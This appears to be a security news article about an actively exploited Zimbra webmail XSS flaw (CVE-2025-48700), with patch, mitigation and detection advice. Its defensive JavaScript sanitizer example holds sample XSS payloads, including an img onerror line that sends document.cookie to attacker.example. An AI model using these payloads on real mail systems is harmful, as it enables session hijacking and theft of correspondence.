CISA: Zimbra XSS (CVE-2025-48700) Now Exploited — 10,500+ Servers Vulnerable

Zimbra XSS vulnerability illustration

Over 10,000 Internet-exposed instances of the Zimbra Collaboration Suite (ZCS) remain vulnerable to an actively exploited cross-site scripting (XSS) flaw, raising fresh alarm about email server security for governments and businesses alike. The vulnerability, tracked as CVE-2025-48700, is serious because it needs no interaction beyond the recipient viewing a crafted message, and it has been confirmed as abused in the wild, prompting action from both the vendor and national cybersecurity authorities.

What happened

Shadowserver, a non-profit Internet security watchdog, reported that more than 10,500 Zimbra servers exposed to the Internet remain unpatched against a critical XSS vulnerability. Synacor, the company that maintains Zimbra, released patches for CVE-2025-48700 in June 2025, warning that the flaw requires no user interaction beyond a recipient viewing a maliciously crafted email in the Zimbra Classic UI. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) subsequently confirmed active exploitation and added the vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, urging rapid remediation.

Who is affected

The affected versions include ZCS 8.8.15, 9.0, 10.0, and 10.1. Zimbra is widely used across public and private sectors—deployments include hundreds of government agencies and thousands of businesses—so the exposed population spans diverse organizations. Shadowserver’s breakdown shows most unpatched servers are in Asia (3,794) and Europe (3,793), underscoring the global scale of the exposure.

How the flaw works

CVE-2025-48700 is a cross-site scripting (XSS) vulnerability: an attacker who needs no account on the server can inject JavaScript that executes in a victim's webmail session. In practice, a crafted email message rendered by the vulnerable Zimbra Classic UI executes script in the context of the logged-in recipient, which can expose session tokens, mail content, or other data accessible within the webmail interface, and lets the script issue requests to the server as that user. Because the payload is inline markup in the message body rather than an attachment or an external link, attachment sandboxing and URL rewriting at the email gateway never see it, which makes the attack stealthy against traditional email defenses.
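To make the class of bug concrete, here is an added example that is not Zimbra's code and does not describe the actual root cause of CVE-2025-48700 (the page does not give it). It places a filter that only strips `<script>` tags, the kind of check that lets a webmail XSS through, beside an allowlist sanitizer that drops event-handler attributes and unsafe URL schemes. The sample message, the tag/attribute allowlists and the tiny tokenizer are constructed for illustration; a production mail client should use a maintained sanitizer such as DOMPurify rather than regexes.

```javascript
// Added illustration, not Zimbra's code and not the root cause of CVE-2025-48700 (which
// this page does not describe): a filter that only strips <script> tags, the kind of
// check that lets webmail XSS through, next to an allowlist sanitizer. The tokenizer is
// deliberately small; production code should use a maintained sanitizer such as DOMPurify.

// Constructed sample: an HTML mail body with no attachment and no visible link, carrying
// payloads in an event handler, an SVG onload, a javascript: URL and a plain <script>.
const SAMPLE_MAIL_HTML = `<p>Quarterly report attached.</p>
<img src="x" onerror="fetch('https://attacker.example/?c=' + document.cookie)">
<svg onload="alert(document.domain)"></svg>
<a href="javascript:alert(1)">details</a>
<script>alert('plain script')</script>
<a href="https://intranet.example/report">report</a>`;

// Naive filter: removes <script> blocks and nothing else. Event handlers and
// javascript: URLs survive, so the message still executes when rendered.
function naiveStripScripts(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Allowlist sanitizer: keep only known-safe tags and attributes, drop every on* handler,
// and only let href/src through with a safe scheme. Unknown tags are removed but their
// text content is kept.
const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'i', 'u', 'em', 'strong', 'a', 'img',
                              'div', 'span', 'ul', 'ol', 'li', 'blockquote']);
const ALLOWED_ATTRS = new Set(['href', 'src', 'alt', 'title']);
const SAFE_URL = /^(https?:|mailto:|cid:)/i;   // cid: keeps inline images working

function escapeAttr(value) {
  return value.replace(/&/g, '&amp;').replace(/</g, '&lt;')
              .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

function sanitizeAttrs(attrString) {
  const out = [];
  const attrRe = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = attrRe.exec(attrString)) !== null) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? '';
    if (!ALLOWED_ATTRS.has(name)) continue;               // drops onerror, onload, style, ...
    if (name === 'href' || name === 'src') {
      // Strip whitespace/control characters first: "java\tscript:" is still javascript:
      const scheme = value.replace(/[\s\u0000-\u001f]/g, '');
      if (!SAFE_URL.test(scheme)) continue;               // drops javascript:, data:, relative URLs
    }
    out.push(`${name}="${escapeAttr(value)}"`);
  }
  return out.length ? ' ' + out.join(' ') : '';
}

function sanitizeMailHtml(html) {
  // Remove script/style blocks with their contents, then rebuild every remaining tag
  // from the allowlist so nothing the attacker wrote reaches the browser verbatim.
  const stripped = html.replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1>/gi, '');
  return stripped.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g, (whole, tag, attrs) => {
    const name = tag.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) return '';
    if (whole.startsWith('</')) return `</${name}>`;
    return `<${name}${sanitizeAttrs(attrs)}>`;
  });
}

// Cheap check used to show the difference: does any active content survive?
function containsActiveContent(html) {
  return /<script\b|\son[a-z]+\s*=|javascript:/i.test(html);
}

console.log('naive filter, still executes: ', containsActiveContent(naiveStripScripts(SAMPLE_MAIL_HTML)));
console.log('allowlist output, executes:   ', containsActiveContent(sanitizeMailHtml(SAMPLE_MAIL_HTML)));
console.log(sanitizeMailHtml(SAMPLE_MAIL_HTML));
```

The naive filter leaves the `onerror`, `onload` and `javascript:` payloads intact, so the message fires as soon as the client renders it; the allowlist version reduces the same body to a paragraph, an empty `<img>`, a bare `<a>` and the one legitimate `https:` link. The design point is that a sanitizer must enumerate what is allowed, not what is forbidden, because browsers offer far more ways to run script than a denylist can keep up with.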

Response and timeline

Synacor published security patches in June 2025 to remediate the issue. CISA's inclusion of the vulnerability in its KEV Catalog, with a directive for Federal Civilian Executive Branch (FCEB) agencies to secure Zimbra servers within three days (by April 23), reflects the urgency of the threat: a three-day window is much shorter than CISA's usual multi-week remediation period and signals that organizations should treat the flaw as a high-priority emergency. That exploitation was confirmed long after fixes were available shows how many installations simply had not been updated, and Shadowserver's ongoing scans continue to show the number of unpatched, Internet-facing installations still at risk.

Why this matters

Zimbra servers often host sensitive communications for organizations with elevated security needs. XSS in a webmail context can turn any recipient into an unwitting execution environment for attacker code, enabling email theft, account takeover, or further lateral phishing inside an organization. The size and distribution of vulnerable servers mean that a successful, scalable campaign could harvest large volumes of credentials and correspondence, with outsized operational and reputational consequences for affected entities.

What administrators should do

  • Apply patches from Synacor immediately for all affected ZCS versions.
  • If patching is not immediately possible, apply compensating controls, keeping in mind that the trigger is an inbound message rendered in the victim's browser: placing the webmail UI behind a VPN or network access controls does not stop a malicious email from arriving, but it does narrow who can reach the interface and whose sessions an attacker can hijack. Restrict administrative access, and increase monitoring for anomalous behavior on mail servers and accounts, such as logins from unexpected locations or new forwarding rules and filters, a common follow-on to webmail session hijacking.
  • Review email gateway and web-proxy logs for suspicious patterns or indicators of compromise, for example inbound messages whose HTML bodies carry inline event-handler attributes, javascript: URLs, or script tags, and consider temporary hardening at the edge, such as stripping or quarantining such HTML at the gateway, where that is feasible without breaking legitimate mail.
  • Audit your external attack surface: identify every publicly reachable Zimbra instance (Shadowserver offers free daily reports to network owners who subscribe for their address space) and remediate those instances promptly.
  • Tell users that a message can carry an attack without any attachment or link, and encourage them to report unexpected or odd-looking mail rather than assume it is harmless because there is nothing to click.

Looking back: past Zimbra exploitation campaigns

Zimbra has been targeted repeatedly by sophisticated threat actors. Earlier XSS and related flaws were exploited by groups such as APT28 (Fancy Bear/Strontium), whose campaigns delivered obfuscated JavaScript in email bodies, and by other nation-linked operators in large-scale operations. Those incidents show that webmail XSS vulnerabilities can be weaponized to steal messages and credentials from high-value targets, which is why rapid patching and proactive defenses are essential.

Conclusion

The discovery of active exploitation against CVE-2025-48700 and Shadowserver’s finding of over 10,500 unpatched servers is a stark reminder that widely deployed collaboration software can become an attractive vector for mass compromise. Organizations running affected Zimbra versions must prioritize patching, apply mitigations where necessary, and monitor their environments closely to prevent and detect abuse. Failure to act quickly risks exposing sensitive communications and enabling further intrusion across networks.
